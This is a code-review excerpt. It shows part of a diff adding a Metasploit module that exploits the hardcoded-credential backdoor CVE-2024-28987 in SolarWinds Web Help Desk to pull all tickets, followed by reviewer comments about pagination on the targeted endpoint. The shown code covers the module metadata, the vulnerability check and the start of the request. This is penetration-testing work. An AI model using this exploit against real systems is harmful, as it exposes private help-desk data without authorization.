modules/auxiliary/gather/solarwinds_webhelpdesk_backdoor.rb

```diff
@@ -0,0 +1,83 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
+  CheckCode = Exploit::CheckCode
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SolarWinds Web Help Desk Backdoor (CVE-2024-28987)',
+        'Description' => %q{
+          This module exploits a backdoor in SolarWinds Web Help Desk <= v12.8.3 to retrieve all tickets from the system.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Zach Hanley' # Discovery & PoC
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-28987'],
+          ['URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987'],
+          ['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2'],
+          ['URL', 'https://www.horizon3.ai/attack-research/cve-2024-28987-solarwinds-web-help-desk-hardcoded-credential-vulnerability-deep-dive/'],
+
+        ],
+        'DisclosureDate' => '2024-08-22',
+        'DefaultOptions' => {
+          'RPORT' => 8443,
+          'SSL' => 'True'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Web Help Desk', '/'])
+      ]
+    )
+  end
+
+  def check
+    @auth = auth
+
+    if @auth.code == 401
+      return Exploit::CheckCode::Safe
+    elsif @auth.code == 200
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def auth
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets'),
```

Comment:
Does this endpoint support pagination?

Reply:
I'm not sure if this specific endpoint supports pagination, but I saw some other endpoints that might support it. I'll have to play around some more to see if there's another endpoint that could be used instead.

Reply:
I was testing around some more, but I didn't see a parameter in `helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets` that allows to limit the records being returned.